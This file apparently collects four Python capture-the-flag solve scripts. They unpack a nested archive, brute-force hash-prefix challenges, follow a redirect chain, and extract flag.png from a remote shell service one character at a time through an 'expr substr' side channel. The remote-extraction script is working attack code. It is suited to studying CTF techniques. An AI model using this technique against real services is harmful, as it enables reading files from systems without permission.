import os
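def getnext(cur):
    """Extract archive *cur* into the working directory and return the next name.

    Runs ``7z e`` on *cur*, lists the current directory, drops *cur* and
    ``popper.py`` from the listing, prints the first remaining entry,
    deletes *cur* and returns that entry.

    From the second call on, *cur* is a file name that came out of the
    previous archive, so it is untrusted input.  It is passed to ``7z`` as a
    single argv element instead of being pasted into a shell command line,
    and the archive is deleted with ``os.remove`` rather than a shell ``rm``.

    Raises:
        SystemExit: if ``7z`` cannot be started or exits non-zero.
        ValueError: if *cur* or ``popper.py`` is missing from the directory.
        IndexError: if nothing else is left in the directory after extraction.
    """
    import subprocess  # local import: subprocess is not imported at file level

    try:
        # "--" ends 7z switch parsing, so a name that begins with "-" is
        # still treated as the archive path and not as an option.
        code = subprocess.run(
            ["7z", "e", "--", cur],
            stdout=subprocess.DEVNULL,
        ).returncode
    except OSError:
        # 7z missing or not executable: handled like a failed extraction.
        code = 1
    if code:
        print("Extraction error... quitting!")
        raise SystemExit
    files = os.listdir('.')
    files.remove(cur)
    files.remove("popper.py")
    print(files[0])
    os.remove(cur)
    return files[0]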
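# Start from the outermost archive and keep unpacking: each extracted file
# becomes the next archive.  The loop has no exit condition of its own; it
# ends when getnext() quits on an extraction error or raises.
cur = "pop.zip"
while True:
    cur = getnext(cur)

# The listing ran the next script's first import onto the line above; it is
# restored to its own line here.
from pwn import *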
import string

# Remote service address as (hostname, port).
host = ("jh2i.com", 50015)
# Filled in below: printable character -> the reply lines the service
# returns when asked to echo that character.
mapc = dict()
# pwntools connection used by every helper in this script.
r = remote(host[0], host[1])
def runCmd(cmd):
    """Send *cmd* over the connection ``r`` and return part of the reply.

    Pending input is discarded first.  Whatever ``r.clean(timeout=0.3)``
    then returns is split on CRLF, and the elements at indexes 2 through 7
    are returned as a list.
    """
    r.clean()  # drop anything left over from an earlier command
    r.sendline(cmd)
    reply = r.clean(timeout=0.3)
    lines = reply.split(b"\r\n")
    return lines[2:8]
# Record, for every printable character, the reply the service gives when
# asked to echo that character; lookup() matches later replies against it.
for ch in string.printable:
    mapc[ch] = runCmd("echo '" + ch + "'")
def lookup(val):
    """Return the first key of ``mapc`` whose stored reply equals *val*.

    Returns ``None`` when no entry matches.
    """
    return next((key for key, reply in mapc.items() if reply == val), None)
def readOutput(cmd):
    """Rebuild the output of *cmd* one character at a time.

    For each position from 1 to 9292 the service is asked, via
    ``expr substr``, for that single character of the command's output.
    The reply is mapped back to a character with ``lookup`` and printed as
    it arrives.  Returns the concatenated characters.

    Raises:
        TypeError: if ``lookup`` returns ``None`` for a reply, because
            ``None`` cannot be appended to the result string.
    """
    collected = ""
    index = 1
    # The upper bound is fixed in the script; it is not derived from the
    # actual length of the command's output.
    while index < 9293:
        reply = runCmd("expr substr $({}) {} 1".format(cmd, index))
        ch = lookup(reply)
        print(ch, end='')
        collected += ch
        index += 1
    return collected
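# Rebuild the base64 text of flag.png character by character and print it.
print(readOutput("base64 flag.png -w0"))

# The listing ran the next script's first import onto the line above; it is
# restored to its own line here.
from pwn import *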
from pwnlib.util.iters import mbruteforce
from hashlib import md5, sha1
# Digest name announced by the service -> matching hashlib constructor.
methods = dict(md5sum=md5, sha1sum=sha1)
# Remote service address as (hostname, port).
host = ("jh2i.com", 50005)
r = remote(host[0], host[1])
# Fifty rounds: read the digest name and the requested digest prefix, search
# for an input of up to 5 characters whose digest starts with that prefix,
# and send it back.
for round_no in range(50):
    r.recvuntil('Enter the data required for the first part of the ')
    method = r.recvuntil(' ')[:-1]
    # NOTE(review): on Python 3 pwntools returns bytes from recvuntil and
    # recvline, while the keys of `methods` and the strings concatenated
    # below are str -- confirm which interpreter this was written for.
    digest = methods[method]
    r.recvuntil(': ')
    target = r.recvline().strip()

    import string
    #chars = string.printable
    # Candidate alphabet: all 256 single-character values except CR and LF.
    chars = [chr(code) for code in range(256)]
    for skipped in ('\r', '\n'):
        chars.remove(skipped)

    def checkhash(candidate):
        """Return True when the hex digest of *candidate* starts with the target."""
        # Only a prefix of the digest is compared, never the full value.
        return digest(candidate).hexdigest().startswith(target)

    print("Goal: " + target)
    print("Method: " + method)
    key = mbruteforce(checkhash, chars, 5, method = 'upto')
    print(list(key))
    r.clean()
    r.sendline(key)
    print(r.recvline(timeout=0.5))
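# NOTE(review): indentation was lost in this listing; this call is assumed to
# run once, after the 50-round loop, to print whatever the service sent last.
print(r.clean(timeout=0.5))

# The listing ran the next script's first import onto the line above; it is
# restored to its own line here.
import os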
import re
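import subprocess  # not imported at file level; needed for argv-list calls

# Follow the redirect chain that starts at flag.php, collecting every URL,
# then fetch each collected URL and keep the second-to-last character of its
# body.
#
# Every URL after the first is built from a Location header sent by the
# server, i.e. from untrusted data.  curl is therefore started with an argv
# list and no shell, so characters in the header are never interpreted as
# shell syntax.
url = "http://jh2i.com:50011/site/flag.php"
urls = []
while 'sorry' not in url:
    data = subprocess.run(
        ["curl", "-Is", url],
        stdout=subprocess.PIPE,
        text=True,
    ).stdout
    # Raises IndexError when the response carries no Location header.
    location = re.findall("Location: (.*)", data)[0]
    if not location.startswith("/"):
        # The value is appended to a fixed origin; anything other than an
        # absolute path could turn the result into a URL for another host.
        raise SystemExit(f"Unexpected redirect target: {location!r}")
    url = "http://jh2i.com:50011" + location
    print(url)
    urls.append(url)
print(urls)

flag = ''
for page in urls:
    data = subprocess.run(
        ["curl", page],
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,
        text=True,
    ).stdout
    # A body needs at least two characters for data[-2] to exist.
    if len(data) >= 2:
        flag += data[-2]
print(flag)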